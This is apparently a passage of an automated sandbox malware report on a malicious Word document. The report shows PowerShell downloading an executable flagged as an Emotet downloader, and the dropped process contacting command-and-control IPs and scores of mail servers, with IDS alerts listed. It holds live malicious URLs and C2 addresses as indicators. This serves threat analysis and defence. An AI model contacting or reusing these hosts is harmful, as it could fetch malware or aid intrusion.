C:\Users\admin\AppData\Local\Temp\IMT34D.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT33B.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT33C.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT338.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT33A.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT337.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT339.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT327.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft Help\MS.WINWORD.14.1033_1033_MKWD_K.HxW
binary
MD5: 8c733439e04098603c0891dcaebd2583
SHA256: 512ff2517de3212ad79839723e76c73ad8468404011c84105ae69dfd93fe277a
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT323.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT322.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT325.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT324.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT326.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT30D.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT30F.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT310.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT30E.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT311.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2FC.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2FB.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2F9.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2FA.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft Help\MS.WINWORD.14.1033_1033_MKWD_F.HxW
binary
MD5: f3617fd3ebcb4a16dc443501674eaa4c
SHA256: 5151e46d67608361a8271cd441df907bf1e52abdf3ac0c1e82733e2654e70b46
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2E9.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2E8.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2D5.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2E7.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2D6.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2D4.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2D3.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2C3.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2C1.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2C2.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft Help\MS.WINWORD.14.1033_1033_MTOC_WINWORD_COL.HxH
binary
MD5: 9431bd7b4d79df2abc027c447025cf90
SHA256: 75129ff1b09ce298bd32054cc712f70a26f4d636c1df93067e992155a90de898
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2B0.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2AF.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT29A.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2AE.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT2AD.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT29C.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT298.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT299.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT29B.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT287.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT288.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT286.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT285.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT274.tmp
––
MD5:  ––
SHA256:  ––
3516
CLVIEW.EXE
C:\Users\admin\AppData\Local\Temp\IMT273.tmp
––
MD5:  ––
SHA256:  ––
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\BROWSE0.WINWORD.xml
xml
MD5: c6b250833c801ff8337ab2ccaaf23408
SHA256: 0c4e4c2aac391920fcc5c10c222b448dd2d419dc79b56fec3a923f47b14b39f9
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\bulletl.gif
image
MD5: 9f9dd2eec107ffbafbcb68a305909024
SHA256: 1aeeb99732bd228eba7090192d57ab9ec437f61caf2dda53412f1b53ffd8992a
1580
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 2e6c332796340affbff5230455889d0d
SHA256: 6f83140e19865c73d28025cdce4dc60261ab057414157519a4a1aaa80df8540e
1580
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183999.TMP
binary
MD5: 2e6c332796340affbff5230455889d0d
SHA256: 6f83140e19865c73d28025cdce4dc60261ab057414157519a4a1aaa80df8540e
1580
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\63PX47LQL1LR0F1YDBUU.temp
––
MD5:  ––
SHA256:  ––
3040
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~$evo-documento.doc
pgc
MD5: 632c5df39eef3946f1ffd9c511d28acd
SHA256: 5e6cbd23c916eb77c9d18f734e139c2de83721f9090f16eda87cf7caceedbd5c
3040
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: 1178bf800a7e9a315a240c34a220ac74
SHA256: d9c88e977d14f6a961a1118b14a375e85a2d6fc2467d14a13161d3d2ebf0e8b7
1880
CLVIEW.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH3171.tmp\back.gif
image
MD5: 5cf4fe788eab2fe10b0dbfd8fa99d9df
SHA256: 21f6f9e91fffa6a49ee14d778c71ca9e96dbd8ae73d8974947ed2c1242e4c38c

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
7
TCP/UDP connections
108
DNS requests
93
Threats
63

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
1580 powershell.exe GET 301 132.148.249.54:80 http://www.amenterprise.info/RiI6wTzC US
html
malicious
1580 powershell.exe GET 200 132.148.249.54:80 http://www.amenterprise.info/RiI6wTzC/ US
executable
malicious
2036 lpiograd.exe GET 200 187.163.174.149:8080 http://187.163.174.149:8080/ MX
binary
malicious
2036 lpiograd.exe GET 200 187.163.174.149:8080 http://187.163.174.149:8080/ MX
binary
malicious
2036 lpiograd.exe GET 200 47.157.181.81:443 http://47.157.181.81:443/whoami.php US
text
malicious
2036 lpiograd.exe GET 200 47.157.181.81:443 http://47.157.181.81:443/ US
binary
malicious
2036 lpiograd.exe GET 200 47.157.181.81:443 http://47.157.181.81:443/ US
binary
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
1580 powershell.exe 132.148.249.54:80 GoDaddy.com, LLC US suspicious
2036 lpiograd.exe 187.163.174.149:8080 Axtel, S.A.B. de C.V. MX malicious
2036 lpiograd.exe 47.157.181.81:443 Frontier Communications of America, Inc. US malicious
2036 lpiograd.exe 202.83.120.115:25 PT. Cybertechtonic Pratama ID unknown
2036 lpiograd.exe 109.237.136.158:465 Envia Tel GmbH DE unknown
2036 lpiograd.exe 74.202.142.35:465 Mail2world INC. US unknown
2036 lpiograd.exe 201.148.105.82:465 Gtd Internet S.A. CL unknown
2036 lpiograd.exe 52.97.146.130:587 Microsoft Corporation US whitelisted
2036 lpiograd.exe 212.204.71.7:465 M-net Telekommunikations GmbH DE unknown
2036 lpiograd.exe 207.167.198.23:465 TELUS Communications Inc. CA unknown
2036 lpiograd.exe 125.234.13.161:587 Viettel Corporation VN unknown
2036 lpiograd.exe 192.145.239.208:25 InMotion Hosting, Inc. US unknown
2036 lpiograd.exe 190.226.40.3:25 Telecom Argentina S.A. AR unknown
2036 lpiograd.exe 197.211.212.76:587 Zimbabwe Online (Private) Ltd. ZW unknown
2036 lpiograd.exe 208.71.172.68:25 Network Data Center Host, Inc. US unknown
2036 lpiograd.exe 64.34.68.80:465 Peer 1 Network (USA) Inc. US unknown
2036 lpiograd.exe 169.255.80.90:25 Concerotel-Botswana BW unknown
2036 lpiograd.exe 190.61.250.160:25 IFX Corporation AR unknown
2036 lpiograd.exe 74.202.142.48:465 Mail2world INC. US unknown
2036 lpiograd.exe 192.99.46.215:465 OVH SAS CA unknown
2036 lpiograd.exe 207.210.229.102:587 Colo4, LLC US unknown
2036 lpiograd.exe 200.69.100.69:587 Colombia CO unknown
2036 lpiograd.exe 64.37.50.178:25 HostDime.com, Inc. US unknown
2036 lpiograd.exe 200.1.119.81:587 IFX Networks Venezuela C.A. VE unknown
2036 lpiograd.exe 198.57.247.166:25 Unified Layer US unknown
2036 lpiograd.exe 108.177.127.109:465 Google Inc. US whitelisted
2036 lpiograd.exe 173.201.192.101:25 GoDaddy.com, LLC US unknown
2036 lpiograd.exe 188.125.73.26:465 CH unknown
2036 lpiograd.exe 69.12.218.40:25 Sonoma Interconnect US unknown
2036 lpiograd.exe 192.249.123.240:587 InMotion Hosting, Inc. US unknown
2036 lpiograd.exe 162.254.116.92:587 Host Duplex, LLC US unknown
2036 lpiograd.exe 76.74.198.254:25 Peer 1 Network (USA) Inc. US unknown
2036 lpiograd.exe 52.97.131.98:587 Microsoft Corporation US whitelisted
2036 lpiograd.exe 138.118.83.78:25 Telecable Economico S.A. CR unknown
2036 lpiograd.exe 192.145.238.21:587 InMotion Hosting, Inc. US unknown
2036 lpiograd.exe 108.177.119.109:587 Google Inc. US whitelisted
2036 lpiograd.exe 50.28.47.31:2525 Liquid Web, L.L.C US unknown
2036 lpiograd.exe 200.6.117.99:25 Ingeniería e Informática Asociada Ltda (IIA Ltda) CL unknown
2036 lpiograd.exe 206.188.198.65:2525 Network Solutions, LLC US unknown
2036 lpiograd.exe 173.230.140.137:26 Linode, LLC US unknown
2036 lpiograd.exe 94.130.219.38:587 Hetzner Online GmbH DE unknown
2036 lpiograd.exe 49.7.36.125:465 CN unknown
2036 lpiograd.exe 77.104.156.61:587 SingleHop, Inc. US unknown
2036 lpiograd.exe 52.97.131.226:587 Microsoft Corporation US unknown
2036 lpiograd.exe 198.54.114.211:25 Namecheap, Inc. US suspicious
2036 lpiograd.exe 85.10.215.153:25 Hetzner Online GmbH DE unknown
2036 lpiograd.exe 68.235.63.75:25 tzulo, inc. US unknown
2036 lpiograd.exe 112.213.89.29:465 SUPERDATA VN malicious
2036 lpiograd.exe 67.225.216.140:465 Liquid Web, L.L.C US unknown
2036 lpiograd.exe 212.227.15.167:465 1&1 Internet SE DE unknown
2036 lpiograd.exe 190.210.132.203:465 NSS S.A. AR unknown
2036 lpiograd.exe 17.172.34.26:465 Apple Inc. US unknown
2036 lpiograd.exe 162.243.240.252:25 Digital Ocean, Inc. US unknown
2036 lpiograd.exe 50.31.0.117:587 Steadfast US unknown
2036 lpiograd.exe 13.91.48.127:25 Microsoft Corporation US whitelisted
2036 lpiograd.exe 198.251.79.161:587 1&1 Internet SE US unknown
2036 lpiograd.exe 87.248.114.12:25 Yahoo! UK Services Limited GB shared
2036 lpiograd.exe 200.13.224.10:25 EPM Telecomunicaciones S.A. E.S.P. CO unknown
2036 lpiograd.exe 81.169.225.231:25 Strato AG DE unknown
2036 lpiograd.exe 50.87.248.137:25 Unified Layer US unknown
2036 lpiograd.exe 169.207.67.18:587 LocalNet Corporation US unknown
2036 lpiograd.exe 192.130.11.6:465 Telia Finland Oyj FI unknown
2036 lpiograd.exe 108.177.119.109:25 Google Inc. US whitelisted
2036 lpiograd.exe 108.177.127.109:25 Google Inc. US whitelisted
2036 lpiograd.exe 212.227.17.177:465 1&1 Internet SE DE unknown
2036 lpiograd.exe 173.254.28.42:587 Unified Layer US suspicious
2036 lpiograd.exe 109.248.141.14:587 RU unknown
2036 lpiograd.exe 201.217.240.8:587 POWER HOST E.I.R.L. CL unknown
2036 lpiograd.exe 209.170.206.183:587 ViaWest US unknown
2036 lpiograd.exe 97.74.135.10:465 GoDaddy.com, LLC US unknown
2036 lpiograd.exe 212.227.15.166:465 1&1 Internet SE DE unknown
2036 lpiograd.exe 190.0.230.202:465 Server Lodge S.A. CR unknown
2036 lpiograd.exe 52.97.146.114:25 Microsoft Corporation US whitelisted
2036 lpiograd.exe 208.91.199.116:25 PDR US unknown
2036 lpiograd.exe 192.99.5.98:587 OVH SAS CA unknown
2036 lpiograd.exe 186.74.239.93:465 Cable & Wireless Panama PA unknown
2036 lpiograd.exe 81.169.145.132:465 Strato AG DE unknown
2036 lpiograd.exe 174.142.99.194:304 iWeb Technologies Inc. CA unknown
2036 lpiograd.exe 74.208.5.2:587 1&1 Internet SE US unknown
2036 lpiograd.exe 190.110.123.232:25 Servicios Informáticos Hostname Ltda CL unknown
2036 lpiograd.exe 188.125.73.26:587 CH unknown
2036 lpiograd.exe 40.100.174.210:587 Microsoft Corporation GB whitelisted
2036 lpiograd.exe 108.177.127.108:465 Google Inc. US whitelisted
2036 lpiograd.exe 204.141.43.189:465 ZOHO US unknown
2036 lpiograd.exe 52.97.133.194:465 Microsoft Corporation US whitelisted
2036 lpiograd.exe 164.160.89.140:587 Elitehost ZA unknown
2036 lpiograd.exe 205.178.146.235:25 Network Solutions, LLC US unknown
2036 lpiograd.exe 72.52.175.34:25 Liquid Web, L.L.C US unknown
2036 lpiograd.exe 190.226.40.2:465 Telecom Argentina S.A. AR unknown
2036 lpiograd.exe 212.227.17.161:465 1&1 Internet SE DE unknown
2036 lpiograd.exe 173.203.187.14:587 Rackspace Ltd. US unknown
2036 lpiograd.exe 151.80.251.167:465 OVH SAS FR unknown
2036 lpiograd.exe 212.227.15.182:465 1&1 Internet SE DE unknown
2036 lpiograd.exe 207.203.133.92:587 BellSouth.net Inc. US unknown
2036 lpiograd.exe 197.242.144.97:587 Afrihost ZA unknown
2036 lpiograd.exe 200.26.173.5:25 WIND Telecom S.A. DO unknown
2036 lpiograd.exe 173.203.187.10:465 Rackspace Ltd. US unknown
2036 lpiograd.exe 185.217.42.134:465 GB unknown
2036 lpiograd.exe 216.55.179.152:587 Codero US unknown
2036 lpiograd.exe 108.177.127.108:587 Google Inc. US whitelisted

DNS requests

Domain IP Reputation
www.amenterprise.info 132.148.249.54
malicious
www.hg-project.de 212.204.71.7
unknown
mail.royco.co.bw 169.255.80.90
unknown
mail.quickhelpexpress.com 208.71.172.68
unknown
mail.telus.net 207.167.198.23
shared
mail.prodigy.net.mx 74.202.142.35
shared
mail.1und1.de No response unknown
mail.otospraxisklinik.de 109.237.136.158
unknown
drindonesia.com 202.83.120.115
unknown
pop3.coypro.com.ar 190.61.250.160
unknown
smtp.live.com 52.97.146.130
52.97.133.178
52.97.146.178
52.97.146.146
shared
hp185.hostpapa.com 64.34.68.80
unknown
smtp.arnetbiz.com.ar 190.226.40.3
unknown
secure232.servconfig.com 192.145.239.208
unknown
mail-2.sslzol.co.zw 197.211.212.76
unknown
mail.atacamagrapes.cl 201.148.105.82
unknown
mail.coopmart.vn 125.234.13.161
203.162.146.116
125.234.100.97
unknown
pop3.codetel.net.do 74.202.142.48
unknown
mail.lagauchita.com 192.99.46.215
unknown
mail.enviacolvanes.com.co 200.69.100.69
unknown
mail.ceramicanorte.com.bo 64.37.50.178
unknown
smtp.ingeolan.com 200.1.119.81
unknown
mail.intervinculo.com 198.57.247.166
unknown
smtp.gmail.com 108.177.127.109
108.177.127.108
shared
smtpout.secureserver.net 173.201.192.101
173.201.193.101
173.201.193.228
68.178.252.101
173.201.192.229
68.178.252.229
shared
smtp.mail.yahoo.com 188.125.73.26
shared
imap.sonic.net 69.12.218.40
shared
mail.laca-laca.com 192.249.123.240
unknown
pop3.reino.com.ar 76.74.198.254
unknown
mail.numerounocom.com 162.254.116.92
unknown
smtp.outlook.com 52.97.131.98
52.97.146.82
52.97.130.2
52.97.131.130
shared
mail.corimotors.com 138.118.83.78
unknown
pop.gmail.com 108.177.119.109
108.177.119.108
shared
mail.corporacionprisma.com 192.145.238.21
unknown
smtp.expressdent.cl 200.6.117.99
unknown
mail.glam-shop.com.mx 50.28.47.31
unknown
smtp.beetlesautobody.com 206.188.198.65
unknown
mail.premiumcorp.com.ec 173.230.140.137
unknown
pop3.sina.net 49.7.36.125
unknown
mail.bensonsteel.com 77.104.156.61
unknown
pop-mail.outlook.com 52.97.131.226
52.97.131.130
52.97.131.162
40.100.173.2
shared
business31.web-hosting.com 198.54.114.211
unknown
mail.eme.com.ar 68.235.63.75
unknown
mail.xtreemcaravans.co.za 85.10.215.153
unknown
mail.duclan.vn 112.213.89.29
unknown
mail.adm-industrial.com 67.225.216.140
unknown
smtp.1und1.de 212.227.15.167
212.227.15.183
shared
smtp.wellpac.com.ar 190.210.132.203
unknown
smtp.mail.me.com 17.172.34.26
17.36.205.74
17.172.34.13
shared
mail.gmail.com No response unknown
smtp.uservers.net 162.243.240.252
162.243.202.76
162.243.199.107
162.243.199.232
shared
smtp.spr.gob.mx 50.31.0.117
unknown
mail.repayonline.pcitoolkit.com 13.91.48.127
unknown
diossa.com.mx 198.251.79.161
unknown
mail.yahoo.com 87.248.114.12
87.248.114.11
shared
smtp.une.net.co 200.13.224.10
shared
mail.cargotrax.eu 81.169.225.231
unknown
mail.ploltun.com 50.87.248.137
unknown
mail.ci-dell.com 169.207.67.18
unknown
pop3.web.de 212.227.17.177
212.227.17.161
unknown
mail.sefiamexico.com 209.170.206.183
unknown
imap.gmail.com 108.177.127.109
108.177.127.108
shared
mail.imba.com.bo 173.254.28.42
malicious
imap.williamsbuickgmc.com 208.91.199.116
208.91.198.215
208.91.199.6
208.91.199.246
unknown
mail.seguridadmayor.cl 201.217.240.8
unknown
mail.hotel-vega.ru 109.248.141.14
unknown
pop3.rtt.co.za No response unknown
pop.secureserver.net 97.74.135.10
173.201.192.158
97.74.135.143
173.201.193.129
173.201.192.129
72.167.218.138
68.178.252.117
173.201.193.97
shared
mail.ferconce.com 190.0.230.202
190.0.230.203
190.0.230.174
190.0.230.175
unknown
pop.1and1.co.uk 212.227.15.166
212.227.15.182
shared
mail.cartierkitchens.com 192.99.5.98
unknown
smtp.meyersgrp.com 186.74.239.93
shared
mail.vodamail.co.za No response unknown
smtp.strato.com 81.169.145.132
shared
mail.humanetcorp.com 174.142.99.194
unknown
smtp.1and1.com 74.208.5.2
shared
mail.cnuevosaires.cl 190.110.123.232
unknown
smtp.zoho.com 204.141.43.189
shared
outlook.office365.com 52.97.133.194
52.97.129.242
52.97.129.226
40.100.174.210
whitelisted
mail.atlantismotors.co.za 164.160.89.140
unknown
imap.metrostamping.com 205.178.146.235
unknown
mail.meieryfischer.com.ar 72.52.175.34
unknown
pop3.chiavassaoscar.arnetbiz.com.ar 190.226.40.2
unknown
mail.emailsrvr.com 173.203.187.14
shared
mail.allmoroccotravel.com 216.55.179.152
unknown
mail.grupoferrara.com 151.80.251.167
unknown
mail.premierservice.co.za 197.242.144.97
unknown
mail.hosting.gob.do 200.26.173.5
unknown
pop.emailsrvr.com 173.203.187.10
shared
mail.grassingtondentalcare.co.uk 185.217.42.134
unknown

Threats

PID Process Class Message
1580 powershell.exe A Network Trojan was detected SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1580 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
1580 powershell.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1580 powershell.exe Misc activity ET INFO EXE - Served Attached HTTP
2036 lpiograd.exe A Network Trojan was detected MALWARE [PTsecurity] Feodo HTTP request
2036 lpiograd.exe A Network Trojan was detected MALWARE [PTsecurity] Feodo HTTP request
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record/traffic
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record version
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record/traffic
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record version
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA SMTP invalid reply
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record/traffic
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record version
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record/traffic
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record version
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record/traffic
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record version
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record/traffic
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record version
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe A Network Trojan was detected MALWARE [PTsecurity] Feodo HTTP request
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record/traffic
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record version
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record/traffic
2036 lpiograd.exe Generic Protocol Command Decode SURICATA TLS invalid record version
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
2036 lpiograd.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction

4 ETPRO signatures available at the full report

Debug output strings

No debug info.